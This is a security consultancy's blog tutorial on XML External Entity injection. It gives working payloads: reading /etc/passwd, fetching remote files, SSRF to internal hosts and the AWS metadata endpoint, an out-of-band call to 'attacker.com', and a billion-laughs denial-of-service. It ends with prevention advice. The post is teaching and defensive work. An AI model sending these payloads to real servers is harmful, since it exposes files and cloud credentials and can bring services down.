Home  ›  All Blogs  ›  dipti.dhandha  › 

How to find and mitigate XML External Entity (XXE) Injection

    dipti.dhandha
    12-April-2021

In this article, we will explain XML External Entity (XXE) Injection, When will XXE vulnerability arise, the most common scenarios to test for XXE vulnerability, pragmatics examples of XXE, and a summary of prevention techniques.

What is XML external entity (XXE) injection?

XML external entity (XXE) injection is the most popular security vulnerability in OWASP Top 10. This vulnerability can arise when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may expose confidential data, local and remote files, operating system level information, SSRF, denial of service, ports scanning information etc.

The XML 1.0 standard defines a variety of types of entities, such as external and internal entities. Entities are used to store information similar to variables in a programming language that can access local or remote data.

When will XXE arise?

  • The application parses the XML files
  • The XML processor is configured to validate and execute DTD
  • The XML processor is configured to execute external entities within DTD

Most common scenarios to test for XXE

  • SOAP APIs
  • XML APIs
  • Functionality that parses SVG, Microsoft office (docx/xlxs/pptx/etc.) file. These are a just zip file filled with XML contents.

Pragmatic Examples:

1. Access local and remote server files

XML DTD can be constructed from internal, external, and parameterized entities. External entities are the entities referenced to other entities found outside of the current XML document. When external entities find the reference to the external URI, it expands the internal structure embedded within the current document, which may reference commands to file or URL.

Example:

Let’s assume that there is an HR web portal checks for leave of an employee by submitting the following XML request to the server:

<?xml version="1.0" encoding="UTF-8"?>
<leave><employerId>13</employerId></leave> 

Suppose the application’s server is not validating the user input before parsing XML data, so you can exploit the XXE vulnerability to retrieve the local file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<leave><employerId>&xxe;</employerId></leave>
Payload explanation:

Image 1

Image 2

The same approach can be applied to retrieve the content from a remote server which could be potentially used for any other accessibility purpose.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://remote-server-ip/user_passwords.txt "> ]>
<leave><employerId>&xxe;</employerId></leave>

2. SSRF attack through XXE

Asides from retrieving the local and remote server files, an attacker can further exploit the system via server-side request forgery (SSRF) attack. SSRF will allow an attacker to make HTTP requests to any URL that the server can access. You can read more about SSRF here.

Example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM " http://internal-system.mydomain.com/">]>
<leave><employerId>&xxe;</employerId></leave>

If this has been executed on a server, this allows an attacker to in-place HTTP requests to an internal server.

Accessing AWS Metadata:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<leave><employerId>&xxe;</employerId></leave>

3. Out of Band XXE

In previous examples, we have discussed that attackers can send requests through XML payload and get responses back from web applications containing some data. However, that’s not always the case, sometimes an attacker sends an XML payload to perform some operation, but, the response will never be returned back although the application is vulnerable to XXE. This is known as Blind XXE vulnerability. Blind XXE is generally harder to exploit than regular XXE vulnerabilities.

Here we have used Out-of-Band techniques to find and exploit Blind XXE vulnerability.

Detecting Blind XXE using Out-of-Band techniques:

The below example is similar to SSRF, but here, we mentioned URL which is controlled by an attacker. When an external entity is parsed on the server, an attacker will get DNS and HTTP request logs on his server.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.com"> ]>
<leave><employerId>&xxe;</employerId></leave>

4. DOS Attack

This attack is also known as the Billion Laugh attack. This attack occurs when the parser continually expands each entity within itself, which overloads the server and results in bringing down the server.

Example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dos [
 <!ENTITY dos1 "DOS Attack">
 <!ENTITY dos2 "&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;">
 <!ENTITY dos3 "&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;">
 <!ENTITY dos4 "&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;">
 <!ENTITY dos5 "&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;">
 <!ENTITY dos6 "&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;">
 <!ENTITY dos7 "&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;">
 <!ENTITY dos8 "&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;">
 <!ENTITY dos9 "&dos8;&dos8;&dos8;&dos8;&dos8;&dos8;&dos8;&dos8;&dos8;&dos8;"> ]>
<leave><employerId>&dos9;</employerId></leave>

When an XML parser loads this document, it will try to resolve the dos9 entity to get value, but dos9 itself has again references to the dos8 entity and so on. So one entity has references to ten entities, and those ten entities are again referenced to other entities. This way, the utilization of CPU increases extensively and results in bringing down the server.

Prevention for XXE

  • Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
  • Disable XML external entity and DTD processing in all XML parsers in the application.
  • Implement positive (“whitelisting”) server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.
  • Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.

For technology specific recommendation you can refer here.

References:

  1. https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
  2. https://portswigger.net/web-security/xxe
  3. https://www.bugcrowd.com/blog/how-to-find-xxe-bugs/
  4. https://we45.com/blog/xxe-injection-attack-3-ways-hit-hard/

About Payatu

Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.

Get in touch with us. Click on the get started button below.

Get to know more about our process, methodology & team!

Close the overlay

I am looking for
Please click one!